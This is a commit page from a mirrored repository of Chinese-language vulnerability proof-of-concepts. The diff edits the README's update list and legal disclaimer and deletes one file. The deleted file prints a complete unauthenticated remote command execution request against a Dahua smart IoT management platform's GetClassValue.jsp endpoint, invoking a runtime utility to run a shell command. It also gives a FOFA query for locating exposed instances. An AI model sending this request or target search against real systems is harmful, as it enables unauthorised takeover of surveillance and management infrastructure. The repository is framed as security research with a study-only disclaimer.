mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
del
This commit is contained in:
parent
d6a2a1e8cf
commit
48cef42900
@ -47,6 +47,10 @@
|
||||
</div>
|
||||
|
||||
|
||||
## 2025.01.11 新增漏洞
|
||||
|
||||
-
|
||||
|
||||
## 2025.01.04 新增漏洞
|
||||
|
||||
- [Guns后台任意文件上传漏洞](./Guns/Guns后台任意文件上传漏洞.md)
|
||||
@ -1670,6 +1674,6 @@
|
||||
|
||||
## 免责声明
|
||||
|
||||
由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。
|
||||
**本项目所涉及的POC仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读法律法规**
|
||||
|
||||
[](https://starchart.cc/wy876/POC)
|
||||
|
||||
@ -1,28 +0,0 @@
|
||||
# 大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞
|
||||
|
||||
大华智能物联综合管理平台GetClassValue.jsp远程代码执行漏洞,攻击者可以不需要授权远程执行命令。
|
||||
|
||||
## fofa
|
||||
|
||||
```javascript
|
||||
app="dahua-智能物联综合管理平台"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```javascript
|
||||
POST /evo-apigw/admin/API/Developer/GetClassValue.jsp HTTP/1.1
|
||||
Host:
|
||||
Content-Type: application/json
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
|
||||
|
||||
{
|
||||
"data": {
|
||||
"clazzName": "com.dahua.admin.util.RuntimeUtil",
|
||||
"methodName": "syncexecReturnInputStream",
|
||||
"fieldName": ["id"]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||

|
||||
Loading…
x
Reference in New Issue
Block a user